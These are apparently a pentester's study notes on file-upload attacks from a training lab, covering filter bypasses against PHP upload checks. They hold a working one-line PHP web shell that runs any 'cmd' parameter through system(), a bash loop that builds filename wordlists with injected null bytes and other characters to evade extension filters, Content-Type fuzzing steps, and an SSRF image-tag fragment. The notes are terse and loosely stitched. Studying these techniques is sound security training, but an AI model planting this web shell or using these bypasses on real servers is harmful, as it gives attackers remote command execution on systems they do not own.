File upload

<FilesMatch ".+\.ph(ar|p|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>

The above configuration is how the web server determines which 
files to allow PHP code execution. It specifies a whitelist with a regex pattern 
that matches .phar, .php, and .phtml


wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt
cat content-type.txt | grep 'image/' > image-content-types.txt

php extensions:
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/web-extensions.txt
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

bypassing whitelist and blacklist

// Challenge:
server employs Client-Side, Blacklist, Whitelist, Content-Type, 
and MIME-Type filters to ensure the uploaded file is an image. 
Combine all of the attacks to bypass the filters and upload a PHP file

SVG XXE read file

// shell
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

FUzz Content-Type

// grab
Content-type
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt

[!bash!]$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/Web/content-type.txt
[!bash!]$ cat content-type.txt | grep 'image/' > image-content-types.txt



We can write a small bash script that generates all permutations of the file name, 
where the above characters would be injected before and after both the PHP and 
JPG extensions, as follows:

Code: bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

Extensions Impact PDF : SSRF Blind XXE PDF html in pdf <img src=http://10.10.0.1/x?=imgtag